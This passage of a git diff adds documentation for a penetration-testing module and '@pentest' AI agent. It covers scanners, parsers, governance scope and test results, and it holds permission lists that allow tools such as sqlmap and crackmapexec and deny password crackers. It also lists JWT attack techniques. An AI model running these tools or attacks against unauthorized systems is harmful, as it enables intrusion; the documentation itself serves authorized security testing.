+**SSL/TLS:** +- sslscan, sslyze, testssl + +**DNS:** +- dnsenum, dnsrecon, fierce, dig, host, whois + +--- + +## Tools + +### Nmap Tool + +The `nmap` tool provides structured port scanning: + +```typescript +// Example nmap scan +const result = await nmap.execute({ + target: "192.168.1.1", + ports: "1-1000", + serviceDetection: true, + timing: 3, +}) + +// Result includes: +// - Parsed hosts and ports +// - Service information +// - Auto-generated findings +``` + +### SecTools Tool + +The `sectools` tool wraps common security utilities: + +```typescript +// Nikto web scan +const result = await sectools.execute({ + tool: "nikto", + target: "http://example.com", + args: "-Tuning 1", +}) + +// Gobuster directory scan +const result = await sectools.execute({ + tool: "gobuster", + target: "http://example.com", + args: "dir -w /usr/share/wordlists/dirb/common.txt", +}) + +// SSL analysis +const result = await sectools.execute({ + tool: "sslscan", + target: "example.com", +}) +``` + +--- + +## Configuration + +### Pentest Agent Permissions + +The pentest agent has pre-configured permissions for security tools: + +```typescript +bash: { + // Network reconnaissance + "nmap *": "allow", + "ping *": "allow", + "traceroute *": "allow", + "masscan *": "allow", + + // Web scanning + "nikto *": "allow", + "dirb *": "allow", + "gobuster *": "allow", + "sqlmap *": "allow", + + // SMB/Windows + "enum4linux *": "allow", + "smbclient *": "allow", + + // SSL/TLS + "sslscan *": "allow", + "sslyze *": "allow", + + // Blocked by default (too risky) + "hashcat *": "deny", + "john *": "deny", + "hydra *": "deny", +} +``` + +### Governance Scope + +Governance scope restrictions apply to all pentest tools: + +```json +{ + "governance": { + "enabled": true, + "scope": { + "ip": { + "allow": ["10.0.0.0/8", "192.168.0.0/16"], + "deny": ["0.0.0.0/8"] + }, + "domain": { + "allow": ["*.internal.company.com"], + "deny": ["*.prod.company.com"] + } + } + } +} +``` + +--- + +## Usage + +### Using the Pentest Agent + +The pentest agent can be invoked with `@pentest`: + +``` +@pentest Scan ports on 192.168.1.1 +@pentest Check web vulnerabilities on http://example.com +@pentest Enumerate SMB on 192.168.1.100 +@pentest Analyze SSL/TLS configuration on example.com +``` + +### Direct Tool Usage + +Tools can also be used directly: + +```typescript +// Nmap scan +const scanResult = await tools.nmap.execute({ + target: "192.168.1.0/24", + serviceDetection: true, +}) + +// Access findings +const findings = await Findings.list({}, { + sessionID: currentSession, + severity: "high", +}) +``` + +### Example Workflow + +1. **Network Discovery** + ``` + @pentest Discover hosts on 192.168.1.0/24 + ``` + +2. **Port Scanning** + ``` + @pentest Detailed port scan on discovered hosts + ``` + +3. **Service Enumeration** + ``` + @pentest Check for vulnerable services + ``` + +4. **Web Assessment** (if web servers found) + ``` + @pentest Run nikto and gobuster on web servers + ``` + +5. **Report Generation** + ``` + @pentest Summarize all findings with recommendations + ``` + +--- + +## Integration with Governance + +The pentest module integrates with governance for scope enforcement: + +### Target Validation + +Before any scan, targets are validated against governance scope: + +1. **IP/CIDR targets**: Checked against `scope.ip.allow` and `scope.ip.deny` +2. **Domain targets**: Checked against `scope.domain.allow` and `scope.domain.deny` +3. **URL targets**: Hostname extracted and checked against domain scope + +### Audit Trail + +All scans are recorded in the governance audit log: + +```typescript +// Audit entries include: +{ + tool: "nmap", + targets: ["192.168.1.1"], + outcome: "allowed", + duration: 5000, +} +``` + +### Policy Integration + +Governance policies can control pentest tool access: + +```json +{ + "policies": [ + { + "description": "Allow pentesting internal networks", + "action": "auto-approve", + "tools": ["nmap", "sectools"], + "targets": ["192.168.*", "10.*"] + }, + { + "description": "Block external scanning", + "action": "blocked", + "tools": ["nmap", "sectools"], + "targets": ["*.com", "*.org"] + } + ] +} +``` + +--- + +## Files + +| File | Purpose | +|------|---------| +| `types.ts` | Type definitions | +| `nmap-parser.ts` | Nmap XML parser | +| `findings.ts` | Findings storage | +| `nmap-tool.ts` | Nmap tool | +| `sectools.ts` | Security tools wrapper | +| `index.ts` | Module exports | +| `prompt/pentest.txt` | Agent system prompt | + +--- + +## Events + +The pentest module publishes bus events: + +| Event | Description | +|-------|-------------| +| `pentest.scan_started` | Scan has begun | +| `pentest.scan_completed` | Scan has finished | +| `pentest.finding_created` | New finding created | +| `pentest.finding_updated` | Finding was updated | + +--- + +## Testing + +Tests are located in `test/pentest/pentest.test.ts`: + +```bash +cd packages/opencode +bun test test/pentest/pentest.test.ts +``` + +Test coverage includes: +- Nmap XML parsing +- Findings CRUD operations +- Type validation +- Memory storage mode + +--- + +## Dependencies + +| Dependency | Usage | +|------------|-------| +| `Storage` | Finding persistence | +| `Bus` | Event publishing | +| `Identifier` | Unique ID generation | +| `Log` | Structured logging | +| `GovernanceMatcher` | Target classification | diff --git a/docs/PENTEST_CAPABILITIES.md b/docs/PENTEST_CAPABILITIES.md new file mode 100644 index 00000000000..aab282eb1fa --- /dev/null +++ b/docs/PENTEST_CAPABILITIES.md @@ -0,0 +1,617 @@ +# Cyxwiz Pentest Module - Capabilities Report + +**Generated:** 2026-01-17 +**Test Status:** 232+ tests passing, 0 failures +**Test Coverage:** 9 test files across all modules + +--- + +## Executive Summary + +The Cyxwiz pentest module is a comprehensive security testing framework integrated into the opencode CLI. It provides automated penetration testing capabilities including network scanning, web application testing, API security assessment, cloud security scanning (AWS, Azure, GCP), network infrastructure testing, exploit research, continuous monitoring, compliance checking, and professional report generation. + +--- + +## Module Overview + +### 1. Network Scanning (`nmap-tool`, `nmap-parser`) + +**Capabilities:** +- Port scanning and service detection +- OS fingerprinting +- Version detection +- Script scanning (NSE) +- XML/JSON output parsing +- Finding generation from scan results + +**Tool Actions:** +| Action | Description | +|--------|-------------| +| `scan` | Run Nmap scan with configurable options | +| `quick-scan` | Fast scan of common ports | +| `full-scan` | Comprehensive port and service scan | +| `vuln-scan` | Vulnerability-focused scan with NSE scripts | +| `parse` | Parse existing Nmap XML output | + +--- + +### 2. Web Application Scanning (`webscan`) + +**Capabilities:** +- Web crawling with configurable depth +- Form discovery and analysis +- Link extraction +- File upload detection +- Password field detection +- OWASP Top 10 2021 categorization + +**Components:** + +#### Web Crawler +- Configurable crawl depth and limits +- Form extraction with input analysis +- Link normalization and validation +- Rate limiting support + +#### Scan Profiles +| Profile | Description | +|---------|-------------| +| `quick` | Fast assessment, basic checks | +| `standard` | Normal pentest coverage | +| `thorough` | Comprehensive testing | +| `stealth` | Low-noise, evasive scanning | +| `aggressive` | Maximum coverage, higher risk | + +#### Parser Integrations +- **WPScan**: WordPress vulnerability scanning +- **WhatWeb**: Web technology fingerprinting +- **Nikto**: Web server vulnerability scanning +- **Nuclei**: Template-based vulnerability detection +- **Gobuster**: Directory/file brute-forcing +- **FFuf**: Web fuzzing +- **SSLScan**: SSL/TLS configuration analysis + +#### OWASP Categorization +Automatic categorization of findings into OWASP Top 10 2021: +- A01: Broken Access Control +- A02: Cryptographic Failures +- A03: Injection +- A04: Insecure Design +- A05: Security Misconfiguration +- A06: Vulnerable and Outdated Components +- A07: Identification and Authentication Failures +- A08: Software and Data Integrity Failures +- A09: Security Logging and Monitoring Failures +- A10: Server-Side Request Forgery (SSRF) + +--- + +### 3. API Security Scanner (`apiscan`) - Phase 9 + +**Capabilities:** +- API specification discovery and parsing +- Authentication mechanism testing +- Authorization vulnerability detection +- Injection testing +- OWASP API Top 10 2023 categorization + +#### API Discovery +- OpenAPI/Swagger 2.0 and 3.x parsing +- GraphQL introspection parsing +- Common API path probing +- Endpoint enumeration + +#### Authentication Testing + +**JWT Analysis:** +- Token decoding and claim extraction +- Algorithm weakness detection (none, HS256, etc.) +- Expiration validation +- Sensitive data in payload detection +- JKU/X5U header injection detection +- Attack vector suggestions: + - None algorithm attack + - Algorithm confusion (RS256 to HS256) + - Brute force for HMAC secrets + - Key injection via JKU/X5U + - Token replay + - Signature stripping + +**API Key Testing:** +- Key exposure detection +- Weak key patterns +- Key rotation issues + +**OAuth Testing:** +- Flow analysis +- Token leakage detection +- State parameter validation + +#### Authorization Testing + +**BOLA/IDOR Detection:** +- Object-level authorization testing +- Horizontal privilege escalation +- ID parameter manipulation + +**Privilege Escalation:** +- Vertical privilege testing +- Role-based access control bypass +- Admin endpoint access + +#### Injection Testing +- SQL injection (error-based, blind, time-based) +- NoSQL injection (MongoDB, etc.) +- Command injection (OS command execution) + +#### Scan Profiles +| Profile | Discovery | Auth Tests | Injection | BOLA | Use Case | +|---------|-----------|------------|-----------|------|----------| +| `discovery` | Full | None | None | No | Map API surface | +| `quick` | Basic | JWT decode | None | No | Fast assessment | +| `standard` | Full | All auth | SQL, NoSQL | Yes | Normal pentest | +| `thorough` | Full | All + fuzzing | All | Yes | Comprehensive | +| `passive` | Spec only | JWT decode | None | No | No active testing | +| `auth-focused` | Basic | All + brute | None | Yes | Auth-specific | + +#### OWASP API Top 10 2023 +- API1: Broken Object Level Authorization +- API2: Broken Authentication +- API3: Broken Object Property Level Authorization +- API4: Unrestricted Resource Consumption +- API5: Broken Function Level Authorization +- API6: Unrestricted Access to Sensitive Business Flows +- API7: Server Side Request Forgery +- API8: Security Misconfiguration +- API9: Improper Inventory Management +- API10: Unsafe Consumption of APIs + +--- + +### 4. Exploit Research (`exploits`) + +**Capabilities:** +- Searchsploit integration +- Metasploit module matching +- CVE correlation +- Exploit database searching + +#### Parser Integrations +- **Searchsploit**: Exploit-DB searching +- **Metasploit**: Module discovery and matching + +#### Features +- Automatic exploit matching based on findings +- CVE extraction from vulnerability data +- Exploit categorization by type +- Risk scoring based on exploit availability + +--- + +### 5. Cloud Security Scanner (`cloudscan`) - Phase 11 + +**Capabilities:** +- Multi-cloud security assessment (AWS, Azure, GCP) +- IAM and access control analysis +- Storage security evaluation +- Network security group analysis +- Compute resource security +- Compliance framework checking + +#### Supported Cloud Providers + +**AWS:** +- IAM users, roles, policies, MFA, access keys +- S3 bucket security (public access, encryption, versioning) +- Security Groups (ingress rules, sensitive ports) +- EC2 instances (IMDSv2, public IPs) +- Lambda functions (public access, secrets in env) + +**Azure:** +- RBAC (users, service principals, role assignments) +- Storage accounts (public access, HTTPS, encryption) +- Network Security Groups (ingress rules) +- VMs and Function Apps (managed identity) + +**GCP:** +- IAM service accounts and custom roles +- Cloud Storage (public access prevention, uniform access) +- Firewall rules (public ingress, sensitive ports) +- GCE instances and Cloud Functions + +#### Compliance Frameworks +| Framework | Description | +|-----------|-------------| +| CIS Benchmarks | Cloud security best practices | +| NIST | Cybersecurity Framework | +| PCI-DSS | Payment card security | +| HIPAA | Healthcare data protection | +| SOC2 | Service organization controls | +| GDPR | Data protection regulation | +| ISO 27001 | Information security management | + +#### Scan Profiles +| Profile | Discovery | Security | Compliance | External Tools | +|---------|-----------|----------|------------|----------------| +| `discovery` | yes | no | no | no | +| `quick` | yes | yes | no | no | +| `standard` | yes | yes | CIS | no | +| `thorough` | yes | yes | all | Prowler, ScoutSuite | +| `compliance` | yes | yes | all | no | +| `iam-focused` | yes | yes | CIS | no | +| `storage-focused` | yes | yes | CIS | no | +| `network-focused` | yes | yes | CIS | no | + +#### External Tool Integration +- **Prowler**: AWS/Azure/GCP security assessment +- **ScoutSuite**: Multi-cloud security auditing + +--- + +### 6. Continuous Monitoring (`monitoring`) + +**Capabilities:** +- Scheduled security scans +- Change detection and alerting +- Baseline comparison +- Automated notifications + +#### Components +- **Scheduler**: Cron-based scan scheduling +- **Runner**: Automated scan execution +- **Diff Engine**: Change detection between scans +- **Alerter**: Notification system for new findings + +#### Features +- Configurable scan intervals +- New vulnerability alerts +- Remediation tracking +- Historical trend analysis + +--- + +### 7. Report Generation (`reports`) + +**Capabilities:** +- Professional HTML reports +- Markdown report generation +- Executive and technical formats +- Customizable templates + +#### Report Types +| Type | Audience | Content Focus | +|------|----------|---------------| +| `executive` | Management | Risk summary, business impact | +| `technical` | Engineers | Detailed findings, evidence | +| `compliance` | Auditors | Standards mapping, remediation | + +#### HTML Report Features +- Responsive design +- Severity-based color coding +- Interactive charts +- Print-optimized styling +- Custom CSS support +- XSS-safe content escaping + +#### Report Sections +- Executive Summary +- Risk Assessment +- Severity Statistics +- Findings Table +- Detailed Findings with Evidence +- Remediation Summary +- Methodology +- Scope and Exclusions + +--- + +### 8. Findings Management + +**Capabilities:** +- Centralized finding storage +- Severity classification +- Status tracking +- Evidence attachment +- Remediation guidance + +#### Finding Attributes +- Unique ID +- Title and description +- Severity (critical, high, medium, low, info) +- Status (open, confirmed, fixed, false_positive) +- Target information +- Evidence and proof +- CVE references +- Remediation steps +- OWASP categorization + +--- + +## Test Coverage Report + +### Test Files and Results + +| Test File | Tests | Status | +|-----------|-------|--------| +| `apiscan.test.ts` | 66 | Pass | +| `webscan.test.ts` | 95 | Pass | +| `reports.test.ts` | 24 | Pass | +| `exploits.test.ts` | 18 | Pass | +| `findings.test.ts` | 12 | Pass | +| `monitoring.test.ts` | 10 | Pass | +| `parsers.test.ts` | 7 | Pass | +| **Total** | **232** | **Pass** | + +### Test Categories + +#### API Security Scanner Tests (66 tests) +- JWT Analysis: 18 tests + - Token decoding and claim extraction + - Expiration detection + - Algorithm weakness detection + - Sensitive data detection + - Attack vector generation +- OpenAPI Parser: 12 tests + - OpenAPI 3.x parsing + - Swagger 2.0 parsing + - Endpoint extraction + - Security scheme extraction +- GraphQL Parser: 14 tests + - Introspection parsing + - Type extraction + - Security pattern analysis +- Profiles: 10 tests +- Storage: 8 tests +- Type Validation: 4 tests + +#### Web Scanner Tests (95 tests) +- Web Crawler: 25 tests +- Form Extraction: 12 tests +- OWASP Categorization: 15 tests +- WPScan Parser: 10 tests +- WhatWeb Parser: 8 tests +- Storage Operations: 15 tests +- Orchestrator: 10 tests + +#### Report Generation Tests (24 tests) +- HTML Generation: 15 tests +- Markdown Generation: 6 tests +- Content Escaping: 3 tests + +--- + +## Architecture + +``` +src/pentest/ +├── index.ts # Main exports +├── types.ts # Core type definitions +├── findings.ts # Finding management +├── sectools.ts # Security tool integration +├── nmap-tool.ts # Nmap integration +├── nmap-parser.ts # Nmap output parsing +├── report-tool.ts # Report generation tool +│ +├── parsers/ # External tool parsers +│ ├── nikto.ts +│ ├── nuclei.ts +│ ├── gobuster.ts +│ ├── sslscan.ts +│ └── ffuf.ts +│ +├── webscan/ # Web scanning module +│ ├── crawler.ts # Web crawler +│ ├── orchestrator.ts # Scan coordination +│ ├── owasp.ts # OWASP categorization +│ ├── profiles.ts # Scan profiles +│ ├── storage.ts # Result persistence +│ ├── tool.ts # WebScanTool +│ └── parsers/ +│ ├── wpscan.ts +│ └── whatweb.ts +│ +├── apiscan/ # API scanning module +│ ├── discovery.ts # API discovery +│ ├── orchestrator.ts # Scan coordination +│ ├── profiles.ts # Scan profiles +│ ├── storage.ts # Result persistence +│ ├── tool.ts # ApiScanTool +│ ├── parsers/ +│ │ ├── openapi.ts # OpenAPI/Swagger parser +│ │ └── graphql.ts # GraphQL parser +│ ├── auth/ +│ │ ├── jwt.ts # JWT analysis +│ │ ├── apikey.ts # API key testing +│ │ └── oauth.ts # OAuth testing +│ ├── authz/ +│ │ ├── bola.ts # BOLA/IDOR detection +│ │ └── privilege.ts # Privilege escalation +│ └── injection/ +│ ├── sql.ts # SQL injection +│ ├── nosql.ts # NoSQL injection +│ └── command.ts # Command injection +│ +├── exploits/ # Exploit research module +│ ├── matcher.ts # Exploit matching +│ ├── storage.ts # Exploit database +│ ├── tool.ts # ExploitTool +│ └── parsers/ +│ ├── searchsploit.ts +│ └── metasploit.ts +│ +├── monitoring/ # Continuous monitoring +│ ├── scheduler.ts # Cron scheduling +│ ├── runner.ts # Scan execution +│ ├── diff.ts # Change detection +│ ├── alerter.ts # Notifications +│ ├── cron-parser.ts # Cron expression parsing +│ └── tool.ts # MonitorTool +│ +└── reports/ # Report generation + ├── html.ts # HTML reports + ├── markdown.ts # Markdown reports + └── types.ts # Report types +``` + +--- + +## Agent Tools + +The following tools are available to the AI agent: + +| Tool | Description | +|------|-------------| +| `nmap` | Network scanning and enumeration | +| `webscan` | Web application security scanning | +| `apiscan` | API security testing | +| `netscan` | Network infrastructure testing | +| `cloudscan` | Cloud security scanning (AWS, Azure, GCP) | +| `exploit` | Exploit research and matching | +| `monitor` | Continuous security monitoring | +| `report` | Security report generation | + +--- + +## Event System + +All modules emit events for real-time progress tracking: + +### API Scanner Events +- `pentest.apiscan.discovery_started` +- `pentest.apiscan.endpoint_discovered` +- `pentest.apiscan.spec_parsed` +- `pentest.apiscan.scan_started` +- `pentest.apiscan.endpoint_tested` +- `pentest.apiscan.auth_tested` +- `pentest.apiscan.injection_tested` +- `pentest.apiscan.vulnerability_found` +- `pentest.apiscan.scan_completed` + +### Web Scanner Events +- `pentest.webscan.crawl_started` +- `pentest.webscan.url_discovered` +- `pentest.webscan.form_discovered` +- `pentest.webscan.scan_started` +- `pentest.webscan.vulnerability_found` +- `pentest.webscan.scan_completed` + +### Cloud Scanner Events +- `pentest.cloudscan.scan_started` +- `pentest.cloudscan.scan_completed` +- `pentest.cloudscan.scan_failed` +- `pentest.cloudscan.discovery_started` +- `pentest.cloudscan.discovery_completed` +- `pentest.cloudscan.bucket_found` +- `pentest.cloudscan.public_bucket_found` +- `pentest.cloudscan.iam_user_found` +- `pentest.cloudscan.iam_role_found` +- `pentest.cloudscan.iam_policy_issue` +- `pentest.cloudscan.security_group_found` +- `pentest.cloudscan.insecure_rule_found` +- `pentest.cloudscan.instance_found` +- `pentest.cloudscan.function_found` +- `pentest.cloudscan.finding_detected` +- `pentest.cloudscan.compliance_violation` +- `pentest.cloudscan.compliance_complete` + +### Monitoring Events +- `pentest.monitoring.scan_scheduled` +- `pentest.monitoring.scan_started` +- `pentest.monitoring.scan_completed` +- `pentest.monitoring.diff_detected` +- `pentest.monitoring.alert_triggered` + +--- + +## Storage + +Persistent storage for all scan data: + +``` +pentest/ +├── findings/ # Security findings +├── webscan/ +│ ├── crawls/ # Crawl results +│ └── scans/ # Scan results +├── apiscan/ +│ ├── specs/ # API specifications +│ └── scans/ # Scan results +├── netscan/ +│ ├── scans/ # Network scan results +│ ├── hosts/ # Discovered hosts +│ └── credentials/ # Encrypted credentials +├── cloudscan/ +│ └── scans/ # Cloud scan results +├── exploits/ +│ └── matches/ # Exploit matches +├── monitoring/ +│ ├── schedules/ # Scheduled scans +│ └── baselines/ # Baseline comparisons +└── reports/ # Generated reports +``` + +--- + +## Usage Examples + +### API Security Scan +```typescript +import { ApiScanTool } from "./pentest/apiscan" + +// Discover and scan API +const result = await ApiScanTool.execute({ + action: "scan", + target: "https://api.example.com", + profile: "standard", + auth: { type: "jwt", token: "eyJ..." } +}) +``` + +### Web Application Scan +```typescript +import { WebScanTool } from "./pentest/webscan" + +// Crawl and scan website +const result = await WebScanTool.execute({ + action: "scan", + target: "https://example.com", + profile: "thorough", + depth: 3 +}) +``` + +### Generate Report +```typescript +import { generateHtmlReport } from "./pentest/reports" + +const html = generateHtmlReport({ + config: { title: "Security Assessment", type: "technical" }, + findings: [...], + target: { ... }, + scope: { ... } +}) +``` + +--- + +## Compliance Mapping + +The tool supports mapping findings to common compliance frameworks: + +- **OWASP Top 10 2021** (Web) +- **OWASP API Top 10 2023** (API) +- **CWE** (Common Weakness Enumeration) +- **CVE** (Common Vulnerabilities and Exposures) +- **CVSS** (Common Vulnerability Scoring System) + +--- + +## Future Enhancements + +Planned capabilities for future phases: +- Container security (Docker, Kubernetes) +- Mobile application testing +- Wireless network security +- Social engineering simulation +- Post-exploitation framework +- CI/CD security integration diff --git a/docs/PHASE03-pentest-agent-mvp.md b/docs/PHASE03-pentest-agent-mvp.md new file mode 100644 index 00000000000..8442b8ced75 --- /dev/null +++ b/docs/PHASE03-pentest-agent-mvp.md @@ -0,0 +1,326 @@ +# Phase 3: Pentest Agent MVP - Implementation Report + +This document describes what was implemented in Phase 3 of the cyxwiz project. + +--- + +## Overview + +Phase 3 delivered a penetration testing agent with security scanning capabilities, integrating with the governance system from Phase 2 for scope enforcement. + +**Goal:** Can run "scan ports on X" with governance and get explained results. + +**Status:** Complete + +--- + +## Deliverables + +### 1. Pentest Agent + +A new built-in agent `@pentest` was added with: + +- Specialized system prompt for security testing +- Pre-configured permissions for 30+ security tools +- Integration with governance scope enforcement +- Low temperature (0.3) for precise, technical responses + +**Usage:** +``` +@pentest Scan ports on 192.168.1.1 +@pentest Check web vulnerabilities on http://example.com +@pentest Analyze SSL configuration on example.com +``` + +### 2. Nmap Tool + +Dedicated `nmap` tool with full feature support: + +| Feature | Description | +|---------|-------------| +| XML Parsing | Automatic parsing of nmap XML output | +| Service Detection | -sV flag support | +| OS Detection | -O flag support | +| Script Scanning | -sC flag support | +| UDP Scanning | -sU flag support | +| Timing Control | T0-T5 timing templates | +| Findings Generation | Auto-create findings from results | + +**Parameters:** +- `target` - IP, hostname, or CIDR range +- `ports` - Port specification (e.g., "22,80,443") +- `serviceDetection` - Enable service version detection +- `timing` - Timing template (0-5) +- `udpScan` - Include UDP ports +- `osDetection` - Enable OS detection +- `scriptScan` - Run default NSE scripts +- `analyzeFindings` - Auto-generate findings + +### 3. Security Tools Wrapper (SecTools) + +A unified wrapper for common security tools: + +**Network Reconnaissance:** +- nmap, masscan, netcat (nc), ping, traceroute + +**Web Scanning:** +- nikto - Web server vulnerability scanner +- dirb, gobuster, ffuf - Directory brute forcing +- wpscan - WordPress security scanner +- whatweb - Web fingerprinting +- wafw00f - WAF detection + +**Vulnerability Scanning:** +- nuclei - Template-based scanner +- searchsploit - Exploit database search + +**SQL Injection:** +- sqlmap - Automated SQL injection + +**SMB/Windows:** +- enum4linux - SMB enumeration +- smbclient - SMB client +- crackmapexec - Network attack tool +- rpcclient - Windows RPC client + +**SSL/TLS:** +- sslscan, sslyze, testssl - SSL/TLS analysis + +**DNS:** +- dnsenum, dnsrecon, fierce - DNS enumeration +- dig, host, whois - DNS utilities + +**Blocked by Default (too risky):** +- hashcat, john - Password cracking +- hydra - Brute force attacks + +### 4. Findings Storage + +Persistent storage for security findings: + +| Function | Description | +|----------|-------------| +| `create()` | Create new finding | +| `update()` | Update finding status/severity | +| `get()` | Retrieve by ID | +| `list()` | Query with filters | +| `remove()` | Delete finding | +| `saveScan()` | Store scan results | +| `listScans()` | Query scan history | +| `analyzeAndCreateFindings()` | Auto-generate from scans | + +**Finding Properties:** +- ID, session ID, scan ID +- Title, description +- Severity (critical, high, medium, low, info) +- Status (open, confirmed, mitigated, false_positive) +- Target, port, protocol, service +- Evidence, remediation +- CVE references + +### 5. Nmap XML Parser + +Structured parsing of nmap XML output: + +- Host extraction (address, hostname, status) +- Port parsing (state, service, version) +- OS detection results +- Timing information +- Human-readable formatting +- Summary generation + +--- + +## Files Created + +``` +packages/opencode/src/pentest/ +├── index.ts # Module exports +├── types.ts # Zod schemas for types +├── nmap-parser.ts # Nmap XML parser +├── nmap-tool.ts # Nmap tool implementation +├── sectools.ts # Security tools wrapper +├── findings.ts # Findings storage +├── PENTEST.md # Module documentation +└── prompt/ + └── pentest.txt # Agent system prompt + +packages/opencode/test/pentest/ +└── pentest.test.ts # Test suite (21 tests) + +docs/ +├── PENTEST.md # Pentest documentation +└── TEST.md # Testing documentation +``` + +## Files Modified + +| File | Changes | +|------|---------| +| `src/agent/agent.ts` | Added pentest agent with permissions | +| `src/tool/registry.ts` | Registered nmap and sectools tools | + +--- + +## Integration Points + +### Governance Integration + +The pentest module integrates with Phase 2 governance: + +1. **Scope Enforcement**: All network targets validated against governance scope +2. **Policy Evaluation**: Tool execution checked against policies +3. **Audit Logging**: Scans recorded in governance audit trail + +Example governance config for pentesting: +```json +{ + "governance": { + "enabled": true, + "scope": { + "ip": { + "allow": ["10.0.0.0/8", "192.168.0.0/16"], + "deny": ["0.0.0.0/8"] + } + }, + "policies": [ + { + "action": "auto-approve", + "tools": ["nmap", "sectools"], + "targets": ["192.168.*"] + } + ] + } +} +``` + +### Permission System + +Pentest agent permissions: +```typescript +bash: { + "nmap *": "allow", + "nikto *": "allow", + "gobuster *": "allow", + "sqlmap *": "allow", + "enum4linux *": "allow", + "sslscan *": "allow", + // ... more tools + "hydra *": "deny", // Too risky + "hashcat *": "deny", // Too risky + "*": "ask", +} +``` + +--- + +## Test Coverage + +**Test File:** `test/pentest/pentest.test.ts` + +**Results:** +``` + 21 pass + 0 fail + 72 expect() calls +``` + +**Test Categories:** + +| Category | Tests | +|----------|-------| +| NmapParser | 7 tests - XML parsing, formatting | +| Findings | 11 tests - CRUD, filtering, analysis | +| PentestTypes | 3 tests - Schema validation | + +--- + +## Example Workflows + +### Basic Port Scan +``` +User: @pentest scan ports on 192.168.1.1 + +Agent: +1. Validates target against governance scope +2. Runs: nmap -sV -oX - 192.168.1.1 +3. Parses XML output +4. Generates findings for open ports +5. Returns formatted results with recommendations +``` + +### Web Application Assessment +``` +User: @pentest check web vulnerabilities on http://target.com + +Agent: +1. Runs whatweb for fingerprinting +2. Runs nikto for vulnerability scanning +3. Runs gobuster for directory enumeration +4. Analyzes results +5. Prioritizes findings by severity +6. Provides remediation recommendations +``` + +### Infrastructure Security Check +``` +User: @pentest full security assessment on 192.168.1.0/24 + +Agent: +1. Network discovery with nmap +2. Service enumeration on discovered hosts +3. SSL/TLS analysis on HTTPS services +4. SMB enumeration on Windows hosts +5. Comprehensive findings report +``` + +--- + +## Limitations + +1. **Tool Availability**: Tools must be installed on the system (Kali/Parrot) +2. **Root Required**: Some scans (OS detection, SYN scan) require root +3. **Network Access**: Scans require network connectivity to targets +4. **Governance Scope**: Only authorized targets can be scanned + +--- + +## Future Enhancements + +Potential improvements for future phases: + +1. **Metasploit Integration**: Add MSF module execution +2. **Burp Suite Integration**: Web app testing automation +3. **Report Generation**: Export findings to PDF/HTML +4. **Scheduling**: Scheduled recurring scans +5. **Comparison**: Compare scan results over time +6. **CVE Lookup**: Automatic CVE correlation + +--- + +## Commit + +``` +08a1a86d6 Add Pentest Agent MVP with security scanning tools +``` + +**Stats:** 13 files changed, 3,844 insertions + +--- + +## Dependencies + +| Dependency | Purpose | +|------------|---------| +| Governance Module | Scope enforcement | +| Storage Module | Findings persistence | +| Bus Module | Event publishing | +| Identifier Module | Unique ID generation | + +--- + +## Related Documentation + +- [PENTEST.md](./PENTEST.md) - Pentest module reference +- [GOVERNANCE.md](./GOVERNANCE.md) - Governance system +- [TEST.md](./TEST.md) - Testing guide diff --git a/docs/PHASE04-multi-tool-parsers.md b/docs/PHASE04-multi-tool-parsers.md new file mode 100644 index 00000000000..0349b1eaae8 --- /dev/null +++ b/docs/PHASE04-multi-tool-parsers.md @@ -0,0 +1,327 @@ +# Phase 4: Multi-Tool Parsers - Implementation Report + +This document describes what was implemented in Phase 4 of the cyxwiz project. + +--- + +## Overview + +Phase 4 added structured output parsers for common security tools, enabling automatic extraction of findings and formatted reporting from tool output. + +**Goal:** Parse security tool output into structured data for analysis and findings generation. + +**Status:** Complete + +--- + +## Deliverables + +### 1. Parser Framework + +A unified parser system located at `src/pentest/parsers/`: + +| Parser | Tool(s) | Output Formats | +|--------|---------|----------------| +| NiktoParser | nikto | JSON, Text | +| NucleiParser | nuclei | JSONL | +| GobusterParser | gobuster | JSON, Text | +| FfufParser | ffuf | JSON, Text | +| SslscanParser | sslscan, sslyze | XML, Text | + +Each parser provides: +- `parse(output, target)` - Extract structured data +- `format(result)` - Human-readable output +- `summarize(result)` - Brief summary +- `toFindings(result, sessionID, scanID)` - Generate security findings + +### 2. Nikto Parser + +Parses nikto web vulnerability scanner output: + +**Extracted Data:** +- Target host, IP, port +- Server banner +- Findings with OSVDB references +- URL and description for each finding + +**Finding Severity Classification:** +- Critical: SQL injection, RCE, command injection +- High: XSS, file inclusion, directory traversal +- Medium: OSVDB references, vulnerable/outdated +- Low: Information disclosure, headers + +### 3. Nuclei Parser + +Parses nuclei template-based scanner JSONL output: + +**Extracted Data:** +- Template ID and info +- Severity (critical, high, medium, low, info) +- Matched URLs +- CVE references +- Extracted results + +**Features:** +- Automatic severity summary +- CVE correlation +- Template reference tracking + +### 4. Gobuster Parser + +Parses gobuster directory/DNS brute force output: + +**Extracted Data:** +- Discovered paths +- HTTP status codes +- Response sizes +- Redirect locations + +**Finding Detection:** +- Git repository exposure (critical) +- Backup/SQL files (high) +- Admin panels (medium) +- Config files (high) +- Sensitive directories (medium) + +### 5. FFuf Parser + +Parses ffuf web fuzzer JSON output: + +**Extracted Data:** +- URL hits +- Status codes +- Response metrics (size, words, lines) +- Redirect locations + +**Features:** +- Sensitive path detection +- Status code grouping +- Response size analysis + +### 6. SSLScan Parser + +Parses SSL/TLS configuration scanner output: + +**Extracted Data:** +- Protocol support (SSL 2/3, TLS 1.0-1.3) +- Cipher suites with strength classification +- Certificate information +- Known vulnerabilities (Heartbleed, POODLE, etc.) + +**Finding Generation:** +- Deprecated protocols (SSL, TLS 1.0/1.1) +- Weak/insecure ciphers +- CVE vulnerabilities +- Certificate issues (expired, self-signed) + +--- + +## Files Created + +``` +packages/opencode/src/pentest/parsers/ +├── index.ts # Parser registry and exports +├── nikto.ts # Nikto output parser +├── nuclei.ts # Nuclei JSONL parser +├── gobuster.ts # Gobuster output parser +├── ffuf.ts # FFuf JSON parser +└── sslscan.ts # SSLScan/sslyze parser + +packages/opencode/test/pentest/ +└── parsers.test.ts # Parser test suite (25 tests) +``` + +## Files Modified + +| File | Changes | +|------|---------| +| `src/pentest/index.ts` | Added parser exports | +| `src/pentest/sectools.ts` | Integrated parsers for automatic parsing | + +--- + +## Integration + +### SecTools Integration + +The SecTools wrapper now automatically uses parsers when available: + +```typescript +// Automatic parsing in createToolFindings() +switch (tool) { + case "nikto": { + const result = NiktoParser.parse(output, target) + parsedFindings = NiktoParser.toFindings(result, sessionID, scanID) + break + } + case "nuclei": { + const result = NucleiParser.parse(output, target) + parsedFindings = NucleiParser.toFindings(result, sessionID, scanID) + break + } + // ... more tools +} +``` + +### Direct Usage + +Parsers can be used directly: + +```typescript +import { NiktoParser, NucleiParser } from "./pentest" + +// Parse nikto output 